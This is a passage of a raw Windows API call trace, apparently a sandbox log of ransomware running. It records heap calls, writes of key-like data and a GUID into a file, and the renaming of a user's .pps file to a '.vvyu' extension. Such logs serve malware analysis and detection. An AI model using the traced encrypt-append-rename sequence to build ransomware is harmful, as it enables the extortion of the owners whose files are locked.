dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0192.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0192.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61e8 | out: hHeap=0x2c0000) returned 1 [0192.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0192.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6230 | out: hHeap=0x2c0000) returned 1 [0192.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0192.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61d0 | out: hHeap=0x2c0000) returned 1 [0192.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61a0 | out: hHeap=0x2c0000) returned 1 [0192.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0192.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0192.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0192.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6188 | out: hHeap=0x2c0000) returned 1 [0192.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3b28 | out: hHeap=0x2c0000) returned 1 [0192.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8e0 | out: hHeap=0x2c0000) returned 1 [0192.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0192.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0192.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0192.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0192.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0192.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0192.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0192.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0192.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0192.462] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0xfc6f, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0xfc6f, lpOverlapped=0x0) returned 1 [0192.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0192.465] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xfc74, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.465] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0192.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0192.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0192.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e8 [0192.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0192.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0192.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0192.466] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0192.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.467] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.467] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0192.467] CloseHandle (hObject=0x584) returned 1 [0192.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0192.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x2af3f88 [0192.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbb48 | out: hHeap=0x2c0000) returned 1 [0192.469] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\YZ4wuGCPKPt9a.pps" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\yz4wugcpkpt9a.pps"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\YZ4wuGCPKPt9a.pps.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\yz4wugcpkpt9a.pps.vvyu")) returned 1 [0192.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0192.470] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x345758 | out: hHeap=0x2c0000) returned 1 [0192.473] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45f368f0, ftCreationTime.dwHighDateTime=0x1d8971f, ftLastAccessTime.dwLowDateTime=0x78c93f70, ftLastAccessTime.dwHighDateTime=0x1d8a6a1, ftLastWriteTime.dwLowDateTime=0x78c93f70, ftLastWriteTime.dwHighDateTime=0x1d8a6a1, nFileSizeHigh=0x0, nFileSizeLow=0xfc74, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YZ4wuGCPKPt9a.pps", cAlternateFileName="YZ4WUG~1.PPS")) returned 0 [0192.474] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0192.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0192.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40210 | out: hHeap=0x2c0000) returned 1 [0192.474] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0192.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0192.474] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0192.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0192.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0192.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0192.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0192.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0192.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0192.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0192.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0192.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0192.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0192.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0192.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0192.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0192.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0192.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0192.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0192.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0192.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0192.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.507] 